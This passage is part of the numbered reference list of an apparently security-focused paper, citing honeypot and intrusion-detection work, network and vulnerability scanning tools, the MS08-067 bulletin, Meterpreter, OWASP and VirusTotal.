[5] Provos, N. A virtual honeypot framework. Proceedings of the 13th conference on USENIX Security Symposium - Volume 13 (2004)

[6] Rowland, C.H. Intrusion detection system (IDS). US Patent 6,405,318

[7] The Wireshark team. Wireshark - The free and open-source packet analyzer. http://www.wireshark.org/

[8] Greenbone Networks GmbH. OpenVAS - Framework for vulnerability scanning. http://www.openvas.org/

[9] MS08-067 vulnerability. Vulnerability in Server Service Could Allow Remote Code Execution. http://technet.microsoft.com/en-us/security/bulletin/ms08-067

[10] Various developers, initially the nmap developers. Nmap scripts to automate a wide variety of networking tasks. http://nmap.org/book/nse.html

[11] Metasploit developers. Meterpreter - Advanced payloads for the Metasploit Framework. http://www.offensive-security.com/metasploit-unleashed/Metasploit_About_Meterpreter

[12] Open Web Application Security Project (OWASP). OWASP is an open-source application security project. https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

[13] Adobe Systems. Adobe Reader - Used to view and print PDF files. http://www.adobe.com/products/reader.html

[14] Virustotal.com - Hispasec Sistemas. Free checking of suspicious files using multiple antivirus engines. http://www.virustotal.com/
